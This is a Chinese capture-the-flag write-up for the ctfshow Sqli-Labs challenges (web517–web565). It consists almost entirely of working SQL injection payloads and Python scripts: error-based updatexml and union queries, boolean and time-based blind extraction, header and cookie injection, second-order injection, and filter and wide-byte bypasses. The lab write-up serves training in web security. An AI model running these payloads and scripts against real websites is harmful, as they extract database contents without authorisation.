【ctfshow】web篇-Sqli-Labs wp

| | | | 4.7k

前言

记录web的题目wp,慢慢变强,铸剑。

Sqli-labs

web517

查所有数据库ctfshow

1
http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1)%23

查表

1
http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables)),1)%23

查字段

1
http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)%23

查flag

1
http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select flag from ctfshow.flag)),1)%23

右半边flag

1
http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select right(flag,20) from ctfshow.flag)),1)%23

最后flag,删除重复部分

1
ctfshow{f5748827-3058-4686-9127-957897bde966}

web518

库ctfshow,表名flagaa字段名flagac

1
id=1  and updatexml(1,concat(0x3d,(select flagac from ctfshow.flagaa)),1)
1
id=1  and updatexml(1,concat(0x3d,(select right(flagac,20) from ctfshow.flagaa)),1)

web519

加个括号

查表 flagaanec

1
http://5795e828-f1e9-416c-83b6-fc0609f0dc8e.challenge.ctf.show:8080/?id=1') and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables)),1)%23

查字段 flagaca

查flag

1
http://5795e828-f1e9-416c-83b6-fc0609f0dc8e.challenge.ctf.show:8080/?id=1') and updatexml(1,concat(0x3d,(select flagaca from ctfshow.flagaanec)),1) --+

右半边

1
http://5795e828-f1e9-416c-83b6-fc0609f0dc8e.challenge.ctf.show:8080/?id=1') and updatexml(1,concat(0x3d,(select right(flagaca,20) from ctfshow.flagaanec)),1) --+

web520

双引号加)闭合,操作一样,flagsf,

1
http://460c46d4-97df-421f-9f8c-95d6e335f87b.challenge.ctf.show:8080/?id=1") and updatexml(1,concat(0x3d,(select flag23 from ctfshow.flagsf)),1) %23

web521

开始盲注了,简单写个二分盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://60390dcc-8ebb-4288-97c6-80258e15c409.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpuck'"
#--------查flag
sql= "select flag33 from ctfshow.flagpuck"
#*************************************************************************************************************************************************************
payload = "?id=1' and if(ascii(substr(({}),{},1))>'{}',1,0)%23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res  =  requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! result is {}'.format(flag))
        break

image-20210810082111885

web522

闭合变双引号了,改改上面的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://5eba9ea8-340b-4668-8e0f-5baf9c16e130.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpa'"
#--------查flag
sql= "select flag3a3 from ctfshow.flagpa"
#*************************************************************************************************************************************************************
payload = '?id=1" and if(ascii(substr(({}),{},1))>"{}",1,0)%23'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res  =  requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

image-20210810083026663

web523

提示说用outfile,但是盲注也可以做,给出两个payload,注意双括号闭合

直接手注

1
http://37bffc8b-7509-49ac-8746-d650a9b5de8f.challenge.ctf.show:8080/?id=1')) union select 1,2,group_concat(flag43) from ctfshow.flagdk into outfile "/var/www/html/111.txt" %23

盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://37bffc8b-7509-49ac-8746-d650a9b5de8f.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagdk'"
#--------查flag
sql= "select flag43 from ctfshow.flagdk"
#*************************************************************************************************************************************************************
payload = "?id=1')) and if(ascii(substr(({}),{},1))>'{}',1,0)%23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res  =  requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web524

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://056b4af4-c1c0-4199-bd9a-9b7ea826fc1a.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagjugg'"
#--------查flag
sql= "select flag423 from ctfshow.flagjugg"
#*************************************************************************************************************************************************************
payload = "?id=1' and if(ascii(substr(({}),{},1))>'{}',1,0)%23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res  =  requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web525

时间盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://d5c8f01f-0c15-423a-b2d0-b32f84581a5b.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagug'"
#--------查flag
sql= "select flag4a23 from ctfshow.flagug"
#*************************************************************************************************************************************************************
payload = "?id=1' and if(ascii(substr(({}),{},1))>'{}',sleep(0.6),0) %23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        try:
            res = requests.get(url=url_get, timeout=0.5)
            tail = mid
        except:
            head = mid + 1
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web526

闭合改成双引号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://4889f924-f7aa-4338-87ec-d12adb999b0e.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagugs'"
#--------查flag
sql= "select flag43s from ctfshow.flagugs"
#*************************************************************************************************************************************************************
payload = '?id=1" and if(ascii(substr(({}),{},1))>"{}",sleep(0.6),0) %23'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        try:
            res = requests.get(url=url_get, timeout=0.5)
            tail = mid
        except:
            head = mid + 1
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web527

post传参

1
passwd=1&uname=1' union select 1,(select flag43s from ctfshow.flagugsd) #

web528

变双引号

web529

报错注入

1
2
3
passwd=1&uname=1') or updatexml(1,concat(0x3d,(select flag4 from ctfshow.flag)),1) %23

ctfshow{571f6255-96ec-4007-98d4
1
2
3
passwd=1&uname=1') or updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) %23

ctfshow{571f6255-96ec-4007-98d4-c1d8fdc4a34f}

web530

1
2
3
ctfshow{fe8d3ab8-7c4e-4f35-92c9
5-92c9-927b68c5e708}
ctfshow{fe8d3ab8-7c4e-4f35-92c9-927b68c5e708}
1
passwd=1&uname=1" or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flagb)),1)  #

web531

post传参的时间盲注,改一下代码跑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://73347aaf-bfb6-42f5-b067-4f280ab6dd4f.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagba'"
#--------查flag
sql= "select flag4sa from ctfshow.flagba"
#*************************************************************************************************************************************************************
payload = "1' or if(ascii(substr(({}),{},1))>'{}',sleep(0.1),1) #"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'uname': payload.format(sql,i,mid),
            'passwd':'1'
        }
        start = time.time()
        res = requests.post(url=url, data=data)
        end = time.time()
        print(end -start)
        if end-start > 1.4:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web532

改一下闭合的参数为双引号加个括号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://dcea8cdc-a6c5-40ad-9d08-ad98fb744785.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#--------查flag
sql= "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
payload = '1") or if(ascii(substr(({}),{},1))>"{}",sleep(0.1),1) #'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'uname': payload.format(sql,i,mid),
            'passwd':'1'
        }
        start = time.time()
        res = requests.post(url=url, data=data)
        end = time.time()
        print(end -start)
        if end-start > 1.4:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web533

1
2
3
4
5
uname=admin&passwd=1' or updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) #

 ctfshow{03109730-de56-4be1-89cd
 1-89cd-ad2c56b2665c}
 ctfshow{03109730-de56-4be1-89cd-ad2c56b2665c}

web534

简单的报错注入,我写个脚本,学习怎么写headers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://dce29b55-ff5f-4e47-a361-8f1cb2fa6b27.challenge.ctf.show:8080"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "'and updatexml(1,concat(0x3d,({})),1),1)#"

headers = {
    "User-Agent" : payload.format(sql)
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web535

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://6385c207-f30c-41ee-9767-bbfa5b90f2b5.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "'and updatexml(1,concat(0x3d,({})),1),1)#"

headers = {
    #"User-Agent" : payload.format(sql)
    'Referer': payload.format(sql)
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web536

做完了忘贴了,这是下一题的payload其实是一个意思,就是把base64加密去掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
import base64

url = "http://7ee17c1d-22b6-4e22-b969-4d2e06d73041.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************





headers = {
    #"User-Agent" : payload.format(sql)
    #'Referer': payload.format(sql)
    'Cookie' : 'uname=' + base64.b64encode(f"admin') and updatexml(1,concat(0x3d,({sql})),1) #".encode()).decode()
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web537

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
import base64

url = "http://7ee17c1d-22b6-4e22-b969-4d2e06d73041.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************





headers = {
    #"User-Agent" : payload.format(sql)
    #'Referer': payload.format(sql)
    'Cookie' : 'uname=' + base64.b64encode(f"admin') and updatexml(1,concat(0x3d,({sql})),1) #".encode()).decode()
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web538

闭合变双引号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
import base64

url = "http://226925d4-af60-4fd1-a5ea-ca56cec0368e.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select flag4 from ctfshow.flag"
#*************************************************************************************************************************************************************





headers = {
    #"User-Agent" : payload.format(sql)
    #'Referer': payload.format(sql)
    'Cookie' : 'uname=' + base64.b64encode(f'admin" and updatexml(1,concat(0x3d,({sql})),1) #'.encode()).decode()
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web539

1
http://64dcaaed-8f7c-491e-9b4c-8ebb54ae8374.challenge.ctf.show:8080/?id=1.1' or  updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and '1'='1

web540

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time


flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select flag4 from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "admin' and if(ascii(substr(({}),{},1))>'{}',sleep(0.4),0)#"
i = 0

session = requests.session()
for i in range(1,666):
    head = 32
    tail = 127

    while head < tail:
        mid = (head+tail) >> 1
        url_register = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login_create.php"
        data = {
            'username' : payload.format(sql,i,mid),
            'password' : '22',
            're_password' : '22',
            'submit' : 'Register'
        }
        res = session.post(url=url_register,data=data)


        url_login = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login.php"
        data = {
            'login_user' : payload.format(sql,i,mid),
            'login_password' : '22',
            'mysubmit' : 'Login'
        }
        res = session.post(url=url_login, data=data)

        url_change = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/pass_change.php"
        data = {
            'current_password' : '22',
            'password' : '1',
            're_password' : '1',
            'submit' : 'Reset'
        }
        start = time.time()
        res = session.post(url=url_change, data=data)
        end = time.time()
        print(end - start)
        if end-start > 0.4 and end-start < 1:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web541

1
http://d0b25a37-1ec0-488a-88ea-c4a6f2d780a2.challenge.ctf.show:8080/?id=1' || updatexml(1,concat(0x3d,(select group_concat(flag4s) from ctfshow.flags )),1)%23

web542

1
http://11917581-19a3-4e00-83bf-7d5dd5e7a4d3.challenge.ctf.show:8080/?id=1.1 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)

web543

基本的当空格的符号都被过滤了

1
2
3
4
5
6
7
8
9
10
11
12
13
对于空格,有较多的方法:

%09 TAB 键(水平)

%0a 新建一行

%0c 新的一页

%0d return 功能

%0b TAB 键(垂直)

%a0 空格

报错注入

查表

1
http://85e19e80-5430-40a0-8004-b63040436341.challenge.ctf.show:8080/?id=1'||updatexml(1,concat(0x3d,(select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`='ctfshow')),1)||'1'='1

查字段

1
http://85e19e80-5430-40a0-8004-b63040436341.challenge.ctf.show:8080/?id=1'||updatexml(1,concat(0x3d,(select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags')),1)||'1'='1

接着查flag

web544

布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://537b3c06-bc22-41e1-a4c3-a65f72d1a4f9.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="database()"
#--------查表
#sql= "select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`='ctfshow'"
#--------查字段
#sql= "select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
#--------查flag
sql= "select`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?id=100')||if(ascii(substr(({}),{},1))>'{}',1,0)||('1'='0"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url=url_get)
        print(res.url)
        if 'Dumb' in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

image-20210811093024535

web545

过滤了select的大小写,但是没过滤混写,直接就报错注入

1
http://6330b356-94f7-4772-a30b-5c077776fed2.challenge.ctf.show:8080/?id=0'%09or%09updatexml(1,concat(0x3d,(SelecT%09right(group_concat(flag4s),20)%09from%09ctfshow.`flags`)),1)%09or%09'1'='0

web546

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://efdac04a-9f0d-4023-8689-95c04fac6cdf.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="database()"
#--------查表
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
#--------查字段
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
#--------查flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = '?id=100"%09or%09if(ascii(substr(({}),{},1))>"{}",1,0)%09or%09"1"="0'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url=url_get)
        print(res.url)
        if 'Dumb' in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web547

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://ee1e575c-882c-4a99-ab79-d10bb4557986.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="database()"
#--------查表
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
#--------查字段
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
#--------查flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?id=1.1')%09or%09if(ascii(substr(({}),{},1))>'{}',1,0)%09or%09('1'='0"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url=url_get)
        print(res.url)
        if 'Dumb' in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web548

用上题的payload

web549

1
http://fd8bb41c-9623-41d7-9b87-012ec43f801d.challenge.ctf.show:8080/?id=1&id=1.1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web550

1
http://dcc7eabd-ecb6-4f83-a660-ce28ab3ba400.challenge.ctf.show:8080/?id=1&id=1.1" union select 1,2,(select group_concat(flag4s) from ctfshow.flags) #

web551

1
http://f69c9b47-4023-4f2f-8bf5-f9e3ab878748.challenge.ctf.show:8080/?id=1&id=1.1") union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web552

宽字节注入,找个%df开头的或者直接用%df,我用’汉’因为汉的url编码是大于%df可以和转义字符组合来绕过

1
http://53c6d802-4048-4c38-ab11-b5d83535dc83.challenge.ctf.show:8080/?id=1.1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web553

1
http://ba8afb54-5cde-40e3-ab92-be77a22ec24f.challenge.ctf.show:8080/?id=1.1汉' union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web554

改post传参

1
passwd='&uname=汉' union select 1,(select group_concat(flag4s) from ctfshow.flags) #

web555

1
http://09ecb96f-d4be-426f-921c-ea2e2843e1ef.challenge.ctf.show:8080/?id=1.1 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)

web556

post

1
passwd=1&uname=1汉' union select 1,(select group_concat(flag4s) from ctfshow.flags )#

web556

1
http://22c4b934-153e-44df-9445-c6226ac0ac9c.challenge.ctf.show:8080/?id=1111' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web557

1
http://22c4b934-153e-44df-9445-c6226ac0ac9c.challenge.ctf.show:8080/?id=1111' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web558

1
http://22c4b934-153e-44df-9445-c6226ac0ac9c.challenge.ctf.show:8080/?id=1111' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web559

1
http://75bb73cb-5451-44d8-8cb3-d6f44fbda222.challenge.ctf.show:8080/?id=0 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)

web560

1
http://c895e905-3a52-4e50-b89d-2b9ddcc32932.challenge.ctf.show:8080/?id=1.1')union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web561

1
http://c235305-3a52-4e50-b89d-2b9ddcc32932.challenge.ctf.show:8080/?id=1.1 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web562

1
login_user=123&login_password=123' or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flags)),1) #&mysubmit=Login

web563

1
login_user=1&login_password=')or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flags)),1)#&mysubmit=Login

web564

1
http://3ba671d4-5c42-4e8a-a797-07e6ee44a52b.challenge.ctf.show:8080/?sort=updatexml(1,concat(0x3d,(select right(group_concat(flag4s),30) from ctfshow.flags)),1)

web565

1
